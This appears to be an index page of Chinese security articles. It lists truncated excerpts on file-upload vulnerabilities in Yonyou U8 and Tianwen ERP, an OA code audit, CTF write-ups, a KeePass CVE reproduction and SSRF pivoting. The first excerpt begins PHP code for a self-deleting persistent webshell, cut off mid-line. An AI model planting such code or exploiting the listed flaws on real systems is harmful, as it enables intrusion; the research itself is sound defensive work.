0x00 创建md5加密密码:代码:<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);$file = '.shel...
用友U8 UploadFileData任意文件上传
0x01 漏洞描述用友GRP-U8R10行政事业财务管理软件是用友公司专注于电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域专业的财务管理软件。用友 GRP-U8 Up...
某OA 审计小记
通达oa 作为攻防演练中出场率较高的一套 OA 系统,决定先从历史漏洞开始挖掘分析,对通达oa 有一个初步的了解通达oa 11.9 的下载地址 默认安装地址是 D:MYOA 联网状态下会自动更新到通达...
buuctf Web 上
buuctf Web1.[HCTF 2018]WarmUp[HCTF 2018]WarmUp访问urlhttp://e00c89a6-d7d6-4a78-a346-614edfb95738.node3...
2022年羊城杯网络安全大赛Writeup
Web1.rce_me题目直接给出了源代码<?php(empty($_GET["file"])) ? highlight_file(__FILE__) : ...
某通T+产品漏洞风险排查及代码缺陷评估
0x01 背景2022年08月28日,各大安全公司监测到很多主机被.locked后缀的勒索病毒加密,通过加密文件特征分析,确认此次勒索病毒为 TellYouThePass 变种。行业监管机构也第一时间...
天问物业ERP系统 uploadfile.aspx 任意文件上传漏洞
0x01 漏洞描述成都天问互联科技有限公司以软件开发和技术服务为基础,建立物业ERP应用系统,向物管公司提供旨在降低成本、保障品质、提升效能为目标的智慧物管整体解决方案,实现物管公司的管理升...
buuctf Basic
buuctf Basic1.Linux Labs根据提示我们可以知道需要远程连接linux服务器,这里使用xshell进行如下配置输入ssh的用户名root,密码123456连接成功构造命令ls .....
sysmon+nxlog监控win下磁盘文件变化
前一段时间做windows数据采集程序,通过notify进行文件变化监控,cpu和内存占用太高,不太适用,windows的文件过滤驱动也没有研究过。今天一位大牛向我推荐了sysmon,下面是实践的流程...
CVE-2023-24055 Keepass密码管理工具漏洞复现
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测及文章作者不为此承担任何责任。 雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章...
手把手带你从SSRF打入内网
手把手带你从SSRF打入内网categories: CTF tags: [ssrf,gopher,redis未授权,frp]date: 2023-02-08 23:31:00解题过程能够对外发起网络请...
分布式系统安全之分布式系统的类
分布式系统的类别和漏洞1.1 分布式系统的类存在多种观点、模型和部署来表征分布式系统。这些包括在物理资源聚合级别(例如,点对点或云系统)定义分布式系统,在中间件级别(例如,发布-订阅、分布式对象平台或...
42